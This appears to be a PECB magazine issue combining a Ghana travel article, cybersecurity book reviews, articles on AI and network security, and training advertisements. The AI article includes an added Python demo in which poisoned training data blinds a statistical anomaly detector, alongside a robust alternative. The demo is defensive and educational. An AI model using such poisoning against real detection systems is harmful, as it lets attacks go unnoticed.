Sekondi-Takoradi serves as both the capital of the Sekondi-Takoradi Metropolitan Assembly (STMA) and the capital of the Western Region of Ghana. The twin city is a coastal city made up of Sekondi and Takoradi; Sekondi is the older of the two. The two cities were combined in 1946. Due to the discovery of oil in the Western Region, the twin city has been nicknamed the oil city of Ghana.

In Sekondi, you can see old and new buildings on a hilly


site that extends to the seashore. Its old port is used by
craft boats and fishing vessels, and it is adjacent to a
naval station. Several modern buildings and tree-shaded
residential areas are present in Takoradi, which is well-
planned to accommodate the lifestyle.

Economic Activities
The city is the industrial and commercial hub of the Western Region. Some of the prominent industries in the city include cement factories, flour mills, the harbor, crude oil production, cocoa processing, timber production, and fishing. The majority of government installations can also be found here.

The city can be accessed both by road and by air from any part of the country. It is approximately a four-hour journey by road and 40 minutes by air from Accra, the capital of Ghana.

The city hosts the Essipong Sports Stadium, a multi-purpose stadium with a capacity of 20,000 people. It also hosts the Takoradi Mall, the largest modern shopping center in the region.

Places to visit
There are numerous places one can visit in the city, including beaches, pubs, nightclubs, and cinemas. Some of the popular beaches in the city are Last Hour Cultural Beach, Africa Beach, Vienna City Beach, and Sports Club Beach.

Tourists and travelers can find first-class accommodation in hotels such as Best Western Plus Atlantic Hotel, The Eagles group of Hotels, Raybow International Hotel, Planters Lodge, and Airport Ridge Villa; there are also many other options for those seeking a more local experience.

One of the major places to visit in the city is the Bisa Aberwa Museum. Bisa Aberwa in the local language means "ask old lady". The museum is located in Nkontompo, a suburb of the city. It contains about 2,000 artifacts, sculptures, and photos of African heroes and of heroes of African descent from across the world. Some of these artifacts narrate events of the slave trade in Africa.

The Festivals
The name of the twin city cannot be mentioned without the popular annual Takoradi Street Carnival, which attracts many tourists. This carnival, also known as the Ankos Festival, is celebrated every Christmas, from December 24th to 26th, and concludes on January 1st, New Year's Day. Tens of different groups of masqueraders assemble to entertain themselves and the public by showcasing their unique dances, costumes, and brass band music. The best group of masqueraders is given an award by the sponsors, based on set criteria. The festival attracts thousands of masqueraders and spectators from across the country, and it is one of the festivals people would not want to miss in Ghana.


Yesu Asor, which translates to "Christ has risen" in English, is a carnival that takes place during the Easter celebrations. It used to be a gathering for churches in Sekondi, but the youth of Sekondi, led by Nana Eshun, Ebenezer Kwamena Thompson, John Sencherey, Richard Kirk Mensah, and Kingsley Jonsia, later revamped it into its current form. The program takes place on Good Friday, Easter Saturday, and Easter Sunday each year. On Good Friday, an effigy of Judas is tied up and beaten mercilessly; a procession then moves through town to mourn the death of Jesus. On the subsequent days, popular musicians and upcoming artists are invited to perform for the audience. Other activities include modeling, football competitions, and the sale of goods. The carnival usually takes place at Kundum Square, popularly known as Komfoase.

It is also worth mentioning the Potomanto Festival, which is celebrated every Christmas in Sekondi. The festival was introduced in Sekondi by Andy Solomon through Ebenezer Kwamena Thompson. In Ghanaian parlance, a potomanto is a large suitcase that usually contains valuable items like kente, jewelry, and other expensive clothing. The festival is celebrated in the last week of every year, from December 29th to January 1st of the following year.

The objective of this festival is to showcase the rich traditional culture of old Ghana. During this period, very old-fashioned dresses are worn, and very old vehicles are displayed on different days according to a schedule. There are community sports competitions, including soccer matches featuring old prominent Ghanaian footballers. Cooking competitions also take place, in addition to comedy shows by local comedians from the city. Old movies are shown to the participants, and exhibitions of crafts also take place during the period.

Conclusion
The twin city is a place where one can relax and enjoy a very good stay for holidays, training, and conferences. To have a fuller experience of the city, you need to visit during the Christmas and Easter holidays. It is a place I strongly recommend to anyone wanting a better feel and view of Ghana.

Partnership with PECB
With PECB being the global leader in ISO certification training, we have been able to tap into its expertise and reputable brand to render quality services to the people of Ghana through our partnership. These trainings have been successful due to the timely support and interventions we have received from PECB. The marketing support provided by PECB has been very valuable to our partnership, and we encourage PECB to continue the good work. We welcome individuals who want to take any of the PECB ISO certification trainings in Ghana. This offers candidates the opportunity to kill two birds with one stone: they can experience the Twin City of Ghana and earn their PECB certifications at the same time. We, at The-Eye-See-T, are very willing and available to support individuals in successfully attaining their preferred PECB certifications in Ghana.

Sherrif Issah
Information Security | Risk and Compliance | Business Continuity | Public Speaker | Columnist

Sherrif Issah is an Information Security Governance, Risk and Compliance professional and a data privacy activist with 15 years of work experience. He is a Cybersecurity Manager at Deloitte Ghana, a Subject Matter Expert for EC-Council, and Director of Communications for the Institute of ICT Professionals Ghana (IIPGH). He consults for institutions across Africa on the implementation, maintenance, and auditing of international security standards and frameworks. As a PECB Certified Trainer, he facilitates ISO Lead Implementer, Lead Auditor, and Lead Manager courses for PECB. He is a columnist with several articles to his credit and has spoken at local and international conferences on cybersecurity and data privacy. He was a panelist at the PECB Virtual Insights Conference 2021. He holds PECB certifications in ISO/IEC 27001, ISO/IEC 27002, ISO/IEC 27032, ISO 22301, and ISO 37301, in addition to CCISO and PCIP.

BOOKS

Ensure Your Cyber Safety – Essential Reads
Due to the misuse of data and the rise in cyber-attacks, ethical hacking, network security, and cybersecurity have also been on the rise, as many organizations rely on them to stay safe and secure. The need to protect your data has become very prominent as cyber threats evolve on a worldwide scale; therefore, every organization must take adequate precautions to protect its sensitive data.

Understanding how to create a secure environment for its users against any malicious activity has become most organizations' highest priority. Probing your organization's vulnerabilities, by evaluating a system for potential security breaches or data threats in order to fix them before a cyber-attack, is highly important. Get a better understanding of staying protected through the books listed below:

Internet of Things: What You Need to Know About IoT, Big Data, Predictive Analytics, Artificial Intelligence, Machine Learning, Cybersecurity, Business Intelligence, Augmented Reality and Our Future by Neil Wilkins

With excellent coverage of IoT and thorough explanations, this book also covers topics such as ethical hacking, predictive analytics, machine learning, artificial intelligence, cybersecurity, big data, business intelligence, augmented reality, virtual reality, and much more. With the growth of internet usage, this book presents an understanding of where our future is going and how to be prepared for it. It covers the concepts and methods powering one of the most ambitious technological concepts of our century, the Internet of Things (IoT), while elaborating on the gadgets and tools to use to stay better prepared for the future of the internet. A well-written, knowledge-based reference book for anyone interested in deepening their knowledge of IoT and related technologies.


Cybersecurity – Attack and Defense Strategies, 2nd Edition by Yuri Diogenes and Erdal Ozkaya

This book delves into recent trends in threats and cyber defense, with great information on various recent or growing technologies and concepts such as Zero Trust, cloud security, the Cyber Kill Chain, identifying types of cyber-attacks, and much more. It offers an understanding of how cyber-criminals gain access to organizations and provides a framework for how organizations can protect themselves with cybersecurity defense strategies that are well laid out and easy to follow. A highly informative book for a wide range of audiences, from those who are new to cybersecurity to experts who want to self-review. For those new to the security field, this book provides the understanding required to define strategies, implement procedures, and refine the tools at your disposal to improve the security posture of your organization, whereas, for senior executives, it provides a high-level holistic view of what the current threat landscape looks like. With no shortage of case studies of real-world occurrences, cybersecurity specialists can use this book as a manual to improve their organization's security posture through the methods explained.

Advanced Penetration Testing: Hacking the World's Most Secure Networks by Wil Allsopp

Nowadays threats are organized, professionally run, and for-profit. All types of organizations and institutions, from financial institutions, health care organizations, law enforcement, and government agencies to other high-value targets, need to reinforce their IT infrastructure and human resources against advanced targeted attacks from motivated professionals. This book incorporates social engineering, programming, and vulnerability exploitation into a multidisciplinary method for targeting and compromising high-security environments. The author presents highly advanced topics and an in-depth understanding of penetration testing, with each chapter exploring different hacking methods in various environments through sample hacking scenarios and real-world examples of attacking networks. Commonly, penetration testing involves low-level hackers attacking a system with a list of known vulnerabilities, and defenders preventing those attacks using an equally well-known list of defensive scans. Today's professional threat actors operate at a much more complex level, and this book shows you ways to defend your high-security network against them.

How to Measure Anything in Cybersecurity Risk by Douglas W. Hubbard and Richard Seiersen

In this book, Hubbard and Seiersen lay out the foundation for decision-making and strategy within cybersecurity through a solid approach to quantitative risk analysis. Using examples and common tools, they show how to apply probability concepts easily to questions that many businesses face today regarding cybersecurity. By presenting a clear framework for non-mathematicians to become statistically literate, this book debunks common misconceptions and allows readers to move beyond qualitative "spotlight charts" into quantifiable probabilities. Presenting a whole new approach to measurement, the authors open the business world's eyes to the critical need for a better measurement system than the common Low, Medium, and High ratings used in cybersecurity. An insightful read, How to Measure Anything in Cybersecurity Risk motivates organizations to examine their own risk management practices more closely in the context of cybersecurity. The aim is to make data protection airtight and to secure your organization before any malicious attack.

TECHNOLOGY

The Impact of AI on Cybersecurity
BY JOHN A. ADELOYE

Cyber-attacks are a key concern for every organization today. As more new technology is developed to make lives better, the chance of becoming the victim of a cyber-attack also rises, since practically every system has some vulnerability that attackers can exploit to compromise it, steal information, demand a ransom, or misinform the public. With the increase in cyber threats that each organization now has to deal with on a daily basis, ranging from phishing, distributed denial of service, and rootkits to man-in-the-middle attacks and more, there is now an urgent need for assistants that can help security analysts work more proficiently and faster. This led to the involvement of artificial intelligence in cybersecurity: AI can analyze data faster than humans can and give better predictions in the shortest possible time.

IN THE AGE OF AI
In this age of artificial intelligence, automation has become the essence of the fourth industrial revolution, from web search technology and human speech analysis to self-driving cars and more. With it comes a higher risk of systems being compromised. As more systems are automated thanks to AI, there is also a greater need for their protection to be automated as well. Much research has shown that 2021 recorded the most cyber-attacks on record, and this number is expected to increase further by the end of 2022, with the majority of the global workforce working away from the secure confines of a corporate network, as recorded by Fortinet.

In this age of AI, attacks are becoming faster in their deployment and reach their targets quickly because of the way they are programmed. About 10 years ago, there were far fewer programmers and cyber intruders compared to the large numbers active in different countries of the world today.


While many are leaning towards learning, those on the attacking side are becoming more advanced with new discoveries of tools, libraries, and machines. Back then, one could use any of a variety of antivirus products to repel attacks, but now the attackers are also following trends by becoming smarter in their deployment and using updated tools. With the help of an AI-based security system, an attack can now be detected and repelled before it even reaches the system, and the data collected from the attacks is also useful for training the AI if it is a supervised or semi-supervised learning model.

HOW AI MADE CYBERSECURITY RELIABLE
With the involvement of AI, the sustainability of cybersecurity is continuously improving. It has also increased system reliability and dependability by helping systems behave as expected even when they process a false input (at least periodically). AI has also advanced system response: most of the work done previously relied on applications that sometimes took a long time to load, or failed to load due to low memory or other reasons.


But in this era of AI, most of the work is now done at the click of a button, thanks to machine learning algorithms running either on the machine or in the cloud; their operation consumes less memory and performs more functions in a shorter time frame. The machine learning model understands the system that sends the request and what the expected output is supposed to look like, due to its ability to read and understand the system's data (for an unsupervised learning model), in order to process its response.

Artificial intelligence has offered a further strategic advantage to cybersecurity through its ability to reduce an organization's exposure to cyber-attacks; some of these attacks are:

Zero-day Attack – an exploit of a vulnerability in an application or system before that vulnerability has been detected and patched. It is almost impossible to build a system or application without at least one vulnerability or potential vulnerability, which means all systems are prone, or potentially prone, to this particular threat.

With the help of artificial intelligence, anomalies in data can be detected and the results quickly disseminated to the security analysts when the system detects zero-day threats. Even though it may not be able to stop them, the result gives security analysts something to start with, rather than having to do the groundwork themselves, which could take a sizable amount of time and unnecessarily delay the effort to defend the system from compromise. Some AI systems go as far as analyzing the data they gather and providing IT engineers with insights on the attack surface and suggestions that can be useful in defending against the attack. Used this way, artificial intelligence reduces the Mean Time To Respond (MTTR).

Ransomware Attack – a type of malware deployed by attackers to lock owners or authorized personnel out of a system, or to encrypt the system's data, in order to demand a ransom before the key to decrypt it is handed over. In this attack, the network has to be compromised first, after which the attacker works towards the domain controller to deploy the ransomware, which blocks access to servers until the ransom is paid. There can be more steps if it is a multi-staged attack.

Most ransomware attacks are launched on a non-working day, in order to delay the response of the IT engineers, since fewer cybersecurity engineers are on duty.


This can happen, and has unfortunately happened numerous times, to some organizations. Maximilian Heinemeyer, VP of Cyber Innovation at Darktrace, says, "It's one thing to detect an attack that has not been seen before, it's another thing to stop its ransomware". While it is easy to detect an attack, stopping its encryption is quite another matter because of the limited time available. Involving AI in such an attack can help detect it at an earlier stage and repel it before it reaches the domain controller. Since some ransomware starts with file encryption, AI can also help stop the intrusion before it gets to the encryption stage.

These are a few of the many attacks a system can be exposed to. Another is phishing mail, which aims to gain access in order to steal information, such as login credentials and other data. Artificial intelligence can help by detecting this type of mail early and blocking its command-and-control channel, which would otherwise redirect the victim away from the genuine page, and can even go as far as cutting the attacker's network connection, depending on how the AI algorithm is programmed.

DRAWBACKS OF AI ON CYBERSECURITY
While it is true that AI can process, evaluate, and predict faster than human intelligence, it requires constant updates and enhancement to keep up with current attack trends, and when this is not done in time, the system can become more vulnerable because of the limitations of the AI model. AI is not human; it is a machine trained by a developer (supervised) or allowed to train itself on available data (unsupervised) to recognize particular patterns or perform certain tasks under given conditions. Because of this, AI can raise false alarms when it sees irrelevant discrepancies, such as fluctuations in web traffic or network instability. This may lead the organization to make unnecessary moves to curtail a supposed attack that never happened, which can itself make the system more vulnerable while the phantom attack is being stopped or investigated.

Another great setback in fully relying on artificial intelligence is that it reduces the alertness of the organization's security experts, as it creates the impression that the AI will always do most of the job; when the AI itself is compromised, they find it harder to defend against the threat, and that buys time for the attackers to operate fully and succeed. If the attacker is skillful enough, he can even manipulate the AI remotely simply by feeding it a wrong dataset, causing the AI to misbehave because its training data has been poisoned.


When it comes to the relationship between humans and the AI in repelling an attack, humans should monitor the AI's activities and must be sharp enough to know when the AI is about to misbehave. Trusting the AI to do the whole job comes with many consequences, and allowing the AI to do only part of the job (sharing responsibilities with humans) can also leave the system that implements the AI more porous, cancelling out the benefits of the AI's involvement.

Earlier cyber threats were aimed mostly at stealing information, either for personal use, for ransom, or for fun. But the new form of attack now involves AI, which gives attackers more leverage to attempt to gain full or partial control of target systems remotely, going as far as changing their behavior if necessary or desired.

Most importantly, relying fully on AI can sometimes lead to harm to humans. Professor Mariarosaria Taddeo of the Oxford Internet Institute states, "By adding 8% of erroneous data to an AI system for drug dosage, attackers could cause up to 75.06% change of the dosages for half of the patients relying on the system for treatment". She further notes that similar results can be achieved by manipulating the classification models of a neural network. Once an AI system is launched, attacks on the AI itself are difficult to detect because of its lack of transparency: the dynamic and adaptive nature of an AI system makes it almost impossible to explain the system's internal processes.
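As an added example, not code from the article or from Darktrace or the Oxford Internet Institute, the following Python puts together the anomaly detection described under the zero-day attack above and the data-poisoning risk Professor Taddeo describes, on a toy traffic model: a threshold anomaly detector (mean plus three standard deviations) trained on requests-per-minute from a sensor gateway, then the same detector after an attacker slips erroneous records amounting to 8% of the clean set into its training data. All numbers are constructed, and the 8% figure is borrowed from the dosage example only to show the same mechanism on a different model. It goes one step beyond the article by also fitting a median/MAD detector, added here because the median is not moved by a minority of poisoned samples (it tolerates up to half the data being corrupted), so the same poison no longer hides the attack.

```python
"""Threshold anomaly detector on a constructed traffic feature, with and without
training-data poisoning. Added example, not from the article; all values are
constructed. The mean/std and median/MAD detectors are the editor's choice."""
from statistics import mean, median, pstdev
from typing import Dict, List, Tuple

# Constructed clean training set: requests per minute observed from a sensor gateway.
CLEAN_TRAINING: List[float] = [100, 110, 120, 130, 140] * 10      # 50 samples, mean 120
# Attacker-controlled records slipped into the training pipeline: 8% of the clean size.
POISON: List[float] = [2000] * int(0.08 * len(CLEAN_TRAINING))  # 4 samples

Model = Tuple[float, float]   # (centre, spread)


def fit_mean_std(samples: List[float]) -> Model:
    """Classic detector: every sample pulls the mean and inflates the spread."""
    return mean(samples), pstdev(samples)


def fit_median_mad(samples: List[float]) -> Model:
    """Robust detector: median and median absolute deviation; a minority of
    outliers cannot move either statistic."""
    centre = median(samples)
    mad = median(abs(x - centre) for x in samples)
    return centre, 1.4826 * mad   # MAD scaled to match the std of normal data


def threshold(model: Model, k: float = 3.0) -> float:
    centre, spread = model
    return centre + k * spread


def is_anomalous(value: float, model: Model, k: float = 3.0) -> bool:
    return value > threshold(model, k)


def run_experiment(attack_rate: float = 600) -> Dict[str, object]:
    """Train three detectors and ask each whether an attack burst of
    `attack_rate` requests/minute would be flagged."""
    clean_model = fit_mean_std(CLEAN_TRAINING)
    poisoned_model = fit_mean_std(CLEAN_TRAINING + POISON)
    robust_model = fit_median_mad(CLEAN_TRAINING + POISON)
    return {
        "clean_threshold": round(threshold(clean_model), 1),
        "poisoned_threshold": round(threshold(poisoned_model), 1),
        "robust_threshold": round(threshold(robust_model), 1),
        "clean_detects": is_anomalous(attack_rate, clean_model),
        "poisoned_detects": is_anomalous(attack_rate, poisoned_model),
        "robust_detects": is_anomalous(attack_rate, robust_model),
    }


if __name__ == "__main__":
    for key, value in run_experiment().items():
        print(f"{key:>20}: {value}")
```

With the constructed data the clean detector's threshold is about 162 requests per minute, so a 600 request burst is an obvious anomaly; four poisoned samples lift the mean/std threshold above 1700 and the same burst passes unnoticed, which is the article's point about an attacker reshaping the model by feeding it the wrong dataset. The median/MAD threshold stays near 164 on the poisoned set, which is why detectors that retrain on live data should prefer robust statistics and should treat the training pipeline itself as an attack surface.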

CONCLUDING OVERVIEW
Cyber infrastructures are now more exposed to diverse
interruptions and warnings that may be due to the
processing of complex information.

Hardware devices are no longer adequate to guarantee the security of these infrastructures. Due to the growth of the internet, attackers now have access to the tools and expertise needed to deploy an attack from the convenience of their homes.


We must fully agree that AI has helped advance the field of security and has provided some sophisticated ways of analyzing, evaluating, predicting, and repelling an attack, and because of this, old hardware-based conventional cybersecurity measures are no longer adequate for fighting the ever-increasing cyber threats.

The existing cybersecurity methods are now becoming obsolete due to ineffectiveness. The old common method of cybersecurity through firewalls now has limitations in the security process. Therefore, there is now a heavy demand for efficient security measures to defend against these new clustered attacks, as cyber interventions carried out by intelligent agents are not sufficient to meet the pace of these cyber threats; at the same time, we should not forget the challenges that lie in fully relying on the AI to do all the tasks that IT engineers are expected to take care of.

John A. Adeloye
Python Developer | Web Developer | Data Analyst | Data Entry Specialist | CyberSecurity Personnel | Technology Writer

John graduated from Brigham Young University-Idaho, Rexburg, Idaho. He currently works as a Research Assistant at Strategic Alpha Investment Advisors Inc., Irvine, California. John is a solution-driven programming analyst with measurable experience in data analysis using Python programming and Excel, Microsoft Power BI, and Tableau. Well-versed in all phases of information technology, and with a strong working knowledge of algorithms. Proven success in engineering customized solutions, data entry, computer networking, computer hardware and software, health and safety, and improving business processes, operations, and profitability. You can reach him at [email protected].

Certified Lead Ethical Hacker

PECB offers the Certified Lead Ethical Hacker (CLEH) training course in both English and French, enriching our library of content, quality, and reliability. With the increase of cyber-attacks, the global need for ethical hacking is increasing as well.

Benefits of getting certified in Lead Ethical Hacking:

• Mastering methods and techniques
• Learning about different attacks that affect an organization's security
• Obtaining the necessary expertise to conduct a penetration test
• Gaining the ability to analyze the results of penetration tests
• Increasing your chances of getting hired in the security career
• Acquiring the ability to support organizations' security

For additional information, please contact us at: [email protected]

Become a CMMC Certified Professional

The CMMC framework is a verification mechanism designed to measure an organization's maturity level regarding the protection of unclassified information.

This course is ideal for those interested in learning about the principles of CMMC, its core concepts, as well as how to manage and implement it effectively.

Get started now with PECB's CMMC Training Course: CMMC Certified Professional

Top Five High-Paying Job Positions You Can Pursue with an ISO/IEC 27032 Cybersecurity Certification

Organizations today are facing fascinating, yet distressing, advancements in technology. The evolution of technology and its wide application has come with many limitations, challenges, and countless sophisticated risks. The frequency of cyber-attacks has grown exponentially during the last few years, and news of big data breaches is becoming very common. In order to protect and secure their cyberspace, organizations must take preventive and safety measures. Cybersecurity is considered to be among the top five ranked risks of 2022.

According to Cybersecurity Ventures, cybercrime costs are expected to grow tremendously in a few years, reaching $10.5 trillion USD annually by 2025. Besides cybercriminals and cyber-attacks themselves, a top threat to cybersecurity is considered to be the negligence of employees who do not follow security guidelines or are not familiar with cybersecurity and its importance. ISO/IEC 27032 provides security techniques and guidelines for cybersecurity.

Considering the high need for cybersecurity experts, ISO/IEC 27032 Cyber Security training courses would be a great solution and asset for any professional who wants to pursue a successful career in the field of cybersecurity.

The ISO/IEC 27032 Cybersecurity Management Certification enables you to protect an organization from cyber threats, strengthens your knowledge and skills, and demonstrates your competencies in cybersecurity.

Note: The salaries presented below are according to information from PayScale, Glassdoor, and ZipRecruiter.

1. Chief Information Security Officer (CISO)

The average U.S. annual salary of a CISO is $166,150.

2. Security Architect

The average U.S. annual salary for an Information Security Architect is $142,123.

3. Cybersecurity Manager

The average salary of a cybersecurity manager is $129,817.

4. Cybersecurity Engineer

The average salary of a cybersecurity engineer is $106,911.

5. Penetration Tester

The average salary of a penetration tester is $95,981.

The PECB ISO/IEC 27032 Cyber Security training courses equip participants with the necessary skills and competencies in protecting privacy and data from phishing scams, cyber-attacks, hacking, data breaches, and other cyber threats. ISO/IEC 27032 certification is also a competitive advantage that raises the chance of certification holders to get employed.

Note: The salaries of the above-mentioned positions are not definitive and may change with time and industry development.

Network Security and Management: A Deeper Understanding

BY PABLO BARRERA

To talk about network security and management, we need to split this subject into smaller bits of information, concepts, and a bit of history. First, let us go back to the concept of security and where it comes from. Security is described as the state of being free from danger or threats. Discussing a network free of dangers or threats is utopian and unrealistic, which is why, when we talk about network security, we should focus on reducing or controlling threats to a level acceptable to the organization and its processes.

Many of the concepts applied to cybersecurity, network security, information security, and related fields are concepts already used in military practice. A few decades ago, we were talking about Demilitarized Zones in the network to expose our services to the internet, defense-in-depth, and many other concepts that are part of the military vocabulary, which is why some of those concepts still apply.

We can define network security as the strategies, policies, processes, and technologies used to secure an organization's data, applications, devices, systems, and resources connected to the organization's network. It is important to understand that network security is a part of cybersecurity. In the past, we used to see organizations as castles or fortresses and the data as the gold inside the chest located in the safest room in the castle.

How important can Network Security be for an organization?

Nowadays, we need to see our organizations as ships, ships that travel in a vast ocean of interconnected organizations, where the information sometimes travels from one ship to another by small boats that leave the ship with precious cargo. Those little boats represent the fact that we have now adopted other ways of working with colleagues, other ways of communicating, and other technologies in our daily lives.

The precious cargo we mention is data, sometimes sensitive and critical. And as we know from basic cybersecurity awareness courses, humans are the weakest link in the chain. Networks now extend to places outside the physical constraints of an office or a corporate network: to public Wi-Fi at coffee shops, to our desk or dining table while working from home, and sometimes even to a bench on a sandy beach while working as a nomad.

The statistics on the way we use devices now are incredible; they show that mobile devices represent about 68% of the total traffic on different websites globally, and desktops are becoming a thing of the past.

One of the biggest insurance companies in the world categorizes cybersecurity incidents as the number one risk that organizations of any size, location, and sector face. Insurance companies are aware of the risks.

This speaks directly to management: cybersecurity is no longer an IT thing, it is a transversal function and should be addressed with a risk approach.

We are changing the way we access our information and how we share it. These new ways of being interconnected to networks, and of how we work, consume, and share information, provide a solid base for new conversations that we, as security practitioners, need to address and respond to according to our organizational priorities.

We need to ask ourselves what new risks we face and whether we are ready to provide our organization and users with the right strategies, policies, processes, and technologies to secure information and assets. Therefore, Network Security is still a growing and exciting field, with new strategies to be developed and new technologies to be invented.
What about the new risks we face?

Besides the traditional strategies we already know and apply, such as perimeter defense, defense-in-depth, and others, we need to talk about the risks that can affect our networks as we have them today. As we mentioned before, networks are now more than just Ethernet cables and Wi-Fi at our offices, with a bunch of servers and network devices connecting computers, users, and services.

Networks can now extend from the coffee shop's Wi-Fi, where the C-level executive takes the morning coffee while checking email or the CRM, to the sandy beach in Thailand where the developer you hired is working on your new project. This means that our devices, no matter where they are, have become the “last mile” of our networks.

With the “new mobility” we have achieved, cybercriminals have found very fertile soil to grow cybercrime and create more advanced ways of achieving their goals.

One example is the way ransomware is expanding now, as it grew almost 150% in the first quarter of 2020. It usually uses three main methods to spread: social engineering, credential harvesting, and vulnerability exploitation. Each method takes advantage of different organizational vulnerabilities. However, the innovation in ransomware attacks is that they have become more like a cybercrime-as-a-service model, rather than just one individual looking for data or crime monetization.

This expands the threat horizon even more: if our devices are the “last mile” of our networks, it means that they are an entry point to our network and our information.

Another entry point that represents high risk, and that we sometimes do not see as a real threat, is suppliers. Supply chain attacks have been in the news more recently, and we know their impact can become a red flag for any organization. It is true that most of the time we cannot extend our controls to our supplier's network, but we can create policies that help our organization choose better suppliers and enforce compliance with our acceptable risk levels. Risks and threats now go beyond our local area network or our data centers; they go wherever there is a user accessing our data or services.

Is it a visibility problem?

We have discussed a bit about cybersecurity, network security, and threats, and this discussion led us to understand that network security is not only a technology problem. As engineers, we say that the more information we have, the better decisions we make. Visibility in the networks is something all cybersecurity professionals want to achieve, yet how can we achieve visibility in an environment that changes and moves so fast? Some network security solutions have come to solve this kind of problem. SIEM, for example, which stands for “Security Information Event Management”, is a technology that, together with other new technologies such as artificial intelligence, gives us not only visibility but also the ability to prevent incidents before they happen. If it were only a visibility problem, Syslog and other known logging technologies would solve it. The problem is that we need to have confidential information digested, and be quick to make the right decisions.

Sometimes we are even letting technology take care of big decisions, as in the case of using machine learning to build anomaly-based behavior detection, something security teams and network security devices rely on a lot these days. In the end, it is not a visibility problem but a speed problem.

How fast can we make decisions based on the information we have? How fast can we respond to attacks and compromise? How resilient are we when we face attacks?

What is the right approach?

Let us talk about risks before we decide on technologies. Many organizations burn millions of the cybersecurity budget purchasing network security hardware and software, sometimes without a prior strategy or risk approach.

We do understand that some technologies need to be there simply because they are the foundations. Firewalls, endpoint protection, intrusion prevention and detection, and user management are examples of network security technologies that need to be in place before going for more advanced solutions. Also, strategies such as network segmentation or least privilege access have been there for a reason.

The goal here is not to criticize the purchasing of new technologies but to take the right approach. We need to hit where it hurts, or rather, where it hurts us: in fact, everything we do needs to be based on lowering the risks we face.

Whether we deploy new technologies or create a new policy or process, everything should work against threats and minimize our vulnerabilities. This way, we can say that we are making a smart investment and not just reactive purchases.

Is Zero Trust network security?

When we talk about network security, the new concept is Zero Trust. It talks about defining our users as our final frontier. The Zero Trust security model tells us that users should only have the access and permissions they require to accomplish their roles in your organization. This allows organizations to have more granularity on what users can and cannot do, and also to get more visibility and a shorter reaction time in case of an attack. The answer is yes, Zero Trust is network security, and managers should start to dig into it.

Pablo Barrera
Cybersecurity Services Director for ES Consulting

He has over 20 years in cybersecurity and holds several certifications, such as CISSP, Ethical Hacking, ISO 27001 Senior Lead Auditor, ISO 27032 Cybersecurity Manager, ISO 27035 Lead Incident Manager, and others related to the field of cybersecurity. A certified trainer for PECB and Mile2, and a known cybersecurity speaker. He is the OWASP Chapter Leader for Guatemala. He currently teaches cybersecurity, networking, and IT audit courses at two universities. Passionate about technologies and cybersecurity, he enjoys discovering vulnerabilities and coaching new cybersecurity talents at ES.
My ongoing time at PECB University is leaving me with an open mind and critically important skills, particularly in communication and project management, which I have begun to deploy in my work. My vision has broadened to the endless opportunities available to make a difference in a field that is important to my career.

Following the communication skills lecture this semester, my communication skills have drastically improved and I have developed a strategic way of going about projects; there are fundamental concepts that my activities are now based on that emanated from my studies at PECB University. By the time my course is finished, I am sure to add value to whatever I am involved in.

PETER OKOLOH
Executive MBA in Business Continuity Management
PREPARE FOR A BETTER FUTURE
INVEST IN KNOWLEDGE!

PECB University offers a multitude of different courses in various academic programs, enlightening your journey to success in your chosen field.

Graduate Certificate Programs
Graduate Certificate in Cybersecurity
Graduate Certificate in Governance, Risk, and Compliance
Graduate Certificate in Business Continuity Management
Graduate Certificate in Management Systems Administration

Executive MBA Programs
Executive MBA in Cybersecurity
Executive MBA in Governance, Risk, and Compliance
Executive MBA in Business Continuity Management

ENHANCE YOUR SKILLS, FOR A SUCCESSFUL JOURNEY

Advance with PECB's new and updated training courses!
Contact us at [email protected] or visit our website for more.

New and updated training courses

Training Course Language Status

ISO/IEC 27005 Lead Risk Manager English Updated

ISO/IEC 27005 Risk Manager English Updated

ISO 45001 Lead Implementer English Updated

ISO 45001 Lead Auditor English Updated

ISO/IEC 27002 Lead Manager English Updated

ISO 37001 Lead Implementer English Updated

ISO 9001 Introduction English Updated

ISO 37001 Lead Implementer Spanish Updated

ISO 37001 Lead Implementer Indonesian New!

ISO/IEC 27001 Lead Implementer Italian New!

SPECIAL THANKS TO

TITANIUM PARTNERS

GOLD PARTNERS

Note that PECB Partners are listed as per the credits acquired from January 1, 2021 to December 31, 2021.